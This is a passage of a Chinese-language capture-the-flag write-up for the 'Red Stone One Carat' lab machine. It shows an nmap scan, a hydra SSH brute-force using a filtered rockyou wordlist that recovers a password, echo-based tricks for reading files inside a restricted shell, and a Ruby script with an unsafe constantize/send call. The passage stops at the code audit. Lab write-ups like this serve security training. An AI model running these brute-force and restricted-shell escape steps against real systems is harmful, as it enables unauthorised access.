Red Stone One Carat
端口扫描
root@ip-10-10-174-17:~/redstoneonecarat# nmap -sTCV -p- --min-rate 1000 10.10.182.190
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-09 04:36 BST
Nmap scan report for ip-10-10-182-190.eu-west-1.compute.internal (10.10.182.190)
Host is up (0.0054s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fe:e7:f2:f6:74:65:a6:dd:f2:94:cd:45:fd:f3:2b:2a (RSA)
| 256 34:a3:16:aa:b3:1f:83:ac:91:a3:31:b4:45:94:3c:c9 (ECDSA)
|_ 256 75:23:c0:66:c7:2c:6e:12:0a:f7:04:61:2b:c6:12:62 (EdDSA)
MAC Address: 02:1B:C1:33:84:13 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.48 seconds
后渗透
noraj
根据提示我筛选了密码, 最终获取到了密码
root@ip-10-10-174-17:~/redstoneonecarat# grep 'bu' `locate rockyou.txt ` >> pass.txt
root@ip-10-10-174-17:~/redstoneonecarat# wc -l pass.txt
126336 pass.txt
root@ip-10-10-174-17:~/redstoneonecarat# hydra -l noraj -P ./pass.txt 10.10.182.190 ssh -t 50 -I
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2023-10-09 09:07:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 50 tasks per 1 server, overall 50 tasks, 126339 login tries (l:1/p:126339), ~2527 tries per task
[DATA] attacking ssh://10.10.182.190:22/
[22][ssh] host: 10.10.182.190 login: noraj password: cheeseburger
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 39 final worker threads did not complete until end.
[ERROR] 39 targets did not resolve or could not be connected
[ERROR] 50 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-10-09 09:07:37
之后我们利用此来进行访问, 但是访问之后我们很遗憾进入的是一个局部 Shell
之后尝试了一系列的命令之后发现其只允许执行 echo 命令, 通过 GPT 的询问我发现了如果利用 echo列出目录以及查看当前目录的文件, 在其中我们发现一个提示文件, 其告诉我们应该去看看服务, 但是我们首先的任务是获取一个 Shell
red-stone-one-carat% echo *
bin user.txt
red-stone-one-carat% echo .*
.cache .hint.txt .zcompdump.red-stone-one-carat.2205 .zshrc
red-stone-one-carat% while read line; do echo $line; done < .hint.txt; echo $line
Maybe take a look at local services.
之后查看 bin 目录发现其存在一个 ruby 程序, 对其进行代码审计,
red-stone-one-carat% echo bin/*
bin/rzsh bin/test.rb
red-stone-one-carat% while read line; do echo $line; done < bin/test.rb; echo $line
#!/usr/bin/ruby
require 'rails'
if ARGV.size == 3
klass = ARGV[0].constantize
obj = klass.send(ARGV[1].to_sym, ARGV[2])
else
puts File.read(__FILE__)
end
